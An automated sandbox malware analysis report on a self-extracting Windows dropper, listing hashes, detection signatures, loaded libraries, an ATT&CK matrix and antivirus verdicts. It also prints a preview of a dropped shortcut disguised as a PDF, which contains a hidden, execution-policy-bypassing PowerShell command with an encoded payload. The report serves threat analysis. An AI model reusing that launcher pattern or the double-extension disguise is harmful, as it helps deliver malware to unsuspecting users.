Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MpkkG8XzhJ.exe

Overview

General Information

Sample name:MpkkG8XzhJ.exe
renamed because original name is a hash value
Original sample name:659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd.exe
Analysis ID:1522696
MD5:51570f6e590151159f4761e2fb4ecd60
SHA1:0cbfb5efe558a632fa1de3861c3b87389c987035
SHA256:659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd
Tags:exeUAC-0099user-JAMESWT_MHT
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
File is packed with WinRar
Found evasive API chain (date check)
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious LNK Double Extension File Created
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • MpkkG8XzhJ.exe (PID: 4928 cmdline: "C:\Users\user\Desktop\MpkkG8XzhJ.exe" MD5: 51570F6E590151159F4761E2FB4ECD60)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Suspicious LNK Double Extension File Created
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\MpkkG8XzhJ.exe, ProcessId: 4928, TargetFilename: C:\Users\user\Desktop\????????? ???? ?? ????????? ??? ? 01.01.24.pdf.lnk

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: MpkkG8XzhJ.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: MpkkG8XzhJ.exeReversingLabs: Detection: 71%
Source: MpkkG8XzhJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MpkkG8XzhJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpkkG8XzhJ.exe
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000BBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000BBA94
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000CD410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_000CD410
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000DC4F8 FindFirstFileExA,0_2_000DC4F8
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000CB080 SetWindowLongW,NtdllDefWindowProc_W,0_2_000CB080
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000B7AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_000B7AAF
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000B92C60_2_000B92C6
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C7DCC0_2_000C7DCC
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C50010_2_000C5001
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C82430_2_000C8243
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C52720_2_000C5272
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D62980_2_000D6298
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C02F70_2_000C02F7
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C13F60_2_000C13F6
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C741E0_2_000C741E
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D64C70_2_000D64C7
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C55A00_2_000C55A0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000DE5F00_2_000DE5F0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C07A00_2_000C07A0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000BD8330_2_000BD833
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000C889F0_2_000C889F
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000B395A0_2_000B395A
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000B4A8E0_2_000B4A8E
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000DEA9E0_2_000DEA9E
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000E2BA40_2_000E2BA4
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000BFCCC0_2_000BFCCC
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000B2EB60_2_000B2EB6
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: String function: 000CFEEC appears 42 times
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: String function: 000D0790 appears 31 times
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: String function: 000CFFC0 appears 56 times
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: MpkkG8XzhJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000B7727 GetLastError,FormatMessageW,0_2_000B7727
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000CB0BE CLSIDFromString,CoCreateInstance,0_2_000CB0BE
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000CB6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_000CB6C2
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_7153640Jump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCommand line argument: sfxname0_2_000CF04C
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCommand line argument: sfxstime0_2_000CF04C
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCommand line argument: STARTDLG0_2_000CF04C
Source: MpkkG8XzhJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: MpkkG8XzhJ.exeReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeFile read: C:\Users\user\Desktop\MpkkG8XzhJ.exeJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: msiso.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: MpkkG8XzhJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MpkkG8XzhJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MpkkG8XzhJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MpkkG8XzhJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MpkkG8XzhJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MpkkG8XzhJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: MpkkG8XzhJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: MpkkG8XzhJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpkkG8XzhJ.exe
Source: MpkkG8XzhJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MpkkG8XzhJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MpkkG8XzhJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MpkkG8XzhJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MpkkG8XzhJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_7153640Jump to behavior
Source: MpkkG8XzhJ.exeStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D07E0 push ecx; ret 0_2_000D07F3
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000CFEEC push eax; ret 0_2_000CFF0A
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeMemory allocated: 7210000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-24219
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000BBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000BBA94
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000CD410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_000CD410
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000DC4F8 FindFirstFileExA,0_2_000DC4F8
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000CF81F VirtualQuery,GetSystemInfo,0_2_000CF81F
Source: MpkkG8XzhJ.exe, 00000000.00000002.2174563720.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeAPI call chain: ExitProcess graph end nodegraph_0-24450
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D09FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000D09FA
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D91A0 mov eax, dword ptr fs:[00000030h]0_2_000D91A0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000DD1E0 GetProcessHeap,0_2_000DD1E0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D09FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000D09FA
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D0B8D SetUnhandledExceptionFilter,0_2_000D0B8D
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D0D7A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000D0D7A
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D4FDF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000D4FDF
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000D0816 cpuid 0_2_000D0816
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_000CC083
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000CF04C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_000CF04C
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exeCode function: 0_2_000BC365 GetVersionExW,0_2_000BC365

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion		LSASS Memory21
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS2
File and Directory Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets34
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
MpkkG8XzhJ.exe71%ReversingLabsWin32.Trojan.Malgent
MpkkG8XzhJ.exe100%AviraEXP/LNK.Agent.ofgtz

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1522696
Start date and time:2024-09-30 15:40:29 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:MpkkG8XzhJ.exe
renamed because original name is a hash value
Original Sample Name:659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd.exe
Detection:MAL
Classification:mal56.winEXE@1/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 120
  • Number of non-executed functions: 95
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: MpkkG8XzhJ.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\Desktop\????????? ???? ?? ????????? ??? ? 01.01.24.pdf.lnk

Download File
Process:C:\Users\user\Desktop\MpkkG8XzhJ.exe
File Type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Nov 30 07:52:33 2023, mtime=Thu Nov 30 07:52:33 2023, atime=Thu Nov 30 07:52:33 2023, length=0, window=hide
Category:dropped
Size (bytes):25631
Entropy (8bit):5.972732311180514
Encrypted:false
SSDEEP:768:dPeFfZZEwj8l3fLSjDcljohJ8AtHMDjr4LunAX:dPUX8l2aFA1MDjrPU
MD5:64752D058E5829210A0F407FB912C9D3
SHA1:4E8A0CFB784A6F93F8974B4F11679786CEF86BB7
SHA-256:0AA794E54C19DBCD5425405E3678AB9BC98FB7EA787684AFB962EE22A1C0AB51
SHA-512:A383CFCAF25DABABB76273EC0802867E1E74D2BCF4640EEE855714B4C7C74E61145C6510668327DEE053D904ED9D5CB4C5BFC3A8149F992FFDCB2CC7A96F1904
Malicious:false
Reputation:low
Preview:L..................Fe..........j#.....j#.....j#...............................P.O. .:i.....+00.../C:\.....................2..:..HG.-..windows\system32\WindowsPowershell\v1.0\powershell.exe.........HG.-.KMI....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.s.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e...F......b-w hidden -nop -noni -exec bypass -c $temp='JVBERi0xLjQKJeLjz9MNCjEgMCBvYmoKPDwgCi9DcmVhdG9yIChDYW5vbiBpUi1BRFYgNjU1NSAgUERGKQovQ3JlYXRpb25EYXRlIChEOjIwMjMwMjEzMDg1OTU3KzAxJzAwJykKL1Byb2R1Y2VyIChcMzc2XDM3N1wwMDBBXDAwMGRcMDAwb1wwMDBiXDAwMGVcMDAwIFwwMDBQXDAwMFNcMDAwTFwwMDAgXDAwMDFcMDAwLlwwMDBcCjNcMDAwZVwwMDAgXDAwMGZcMDAwb1wwMDByXDAwMCBcMDAwQ1wwMDBhXDAwMG5cMDAwb1wwMDBuXDAwMFwwMDApCj4+IAplbmRvYmoKMiAwIG9iago8PCAKL1BhZ2VzIDMgMCBSIAovVHlwZSAvQ2F0YWxvZyAKL091dHB1dEludGVudHMgMTIgMCBSIAovTWV0YWRhdGEgMTMgMCBSIAo+PiAKZW5kb2JqCjQgMCBvYmoKPDwgL1R5cGUgL1hPYmplY3QgL1N1YnR5cGUgL0ltYWdlIC9XaWR0aCAxMjQwIC9IZWlnaHQgMTc1MyAvQml0c1BlckNvbXBvbmVudCA4IAovQ29sb3JTcGFjZSAvRGV2aWNlR3Jhe

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.814308062083348
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:MpkkG8XzhJ.exe
File size:344'623 bytes
